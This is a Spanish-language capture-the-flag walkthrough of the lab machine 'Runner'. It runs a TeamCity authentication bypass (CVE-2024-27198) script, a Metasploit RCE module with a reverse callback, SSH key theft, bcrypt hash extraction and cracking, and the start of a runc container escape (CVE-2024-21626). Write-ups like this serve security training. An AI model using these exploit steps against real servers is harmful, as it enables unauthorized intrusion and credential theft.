Runner

OS: Linux
Dificultad: Medio
Puntos: 30

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.238.77 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.238.77
Nmap scan report for 10.129.238.77
Host is up, received reset ttl 63 (0.13s latency).
Scanned at 2024-04-23 02:46:41 EDT for 11s

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp   open  http        syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Enumeramos subdominios y encontramos el siguiente.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.runner.htb" -u http://runner.htb -fw 4
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://runner.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.runner.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 4
________________________________________________

teamcity                [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 490ms]

Podemos ver que se muestra la aplicacion teamcity y su version.

TeamCity Auth Bypass (CVE-2024-27198)

Investigando vulnerabilidades de esa version nos percatamos que es posible crearnos una cuenta usando el siguiente script para acceder a la aplicacion.

python3 CVE-2024-27198.py -t http://teamcity.runner.htb -u doom -p doom
[+] Version Found:  2023.05.3 (build 129390)
[+] Server vulnerable, returning HTTP 200
[+] New user doom created succesfully! Go to http://teamcity.runner.htb/login.html to login with your new credentials :)

Tambien es posible obtener RCE con esta misma vulnerabilidad.

msfconsole
use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
set rhosts teamcity.runner.htb
set rport 80
set lhost tun0
run

SSH Keys

Podemos encontrar una llave privada rsa en los proyectos.

cat data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys

Tambien es posible obtenerla desde la pagina web.

Esa llave la podemos usar para conectarnos por SSH con el usuario john.

chmod 400 id_rsa 
ssh -i id_rsa john@10.129.238.77                                      
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-102-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

john@runner:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)

Lateral Movement

Revisando los archivos de teamcity desde la primera shell obtenemos el hash del usuario matthew.

meterpreter > download /data/teamcity_server/datadir/system/buildserver.data
[*] Downloading: /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Downloaded 512.00 KiB of 512.00 KiB (100.0%): /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Completed  : /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
strings buildserver.data | grep -A 5 matthew
matthew
<$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
Matthew
matthew@runner.htb
BCRYPT
hasSeenExperimentalOverview

Cack hash

Usamos john para obtener el password.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
piper123         (?)     
1g 0:00:01:21 DONE (2024-04-23 04:48) 0.01221g/s 635.7p/s 635.7c/s 635.7C/s playboy93..onelife
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Privilege Escalation

En el archivo hosts encontramos un nuevo subdominio.

john@runner:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 runner runner.htb teamcity.runner.htb portainer-administration.runner.htb

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Lo agregamos a nuestro archivo hosts y accedemos a un portal web.

Con las credenciales de matthew podemos autenticarnos.

matthew : piper123

Despues de investigar e intentar varias cosas llegamos a este articulo que explica como podemos explotar una vulnerabilidad de docker para salir del sandbox.

https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd

Primero crearemos un contenedor con las siguientes caracteristicas.

Desplegamos el contenedor y ahora podemos acceder a la consola.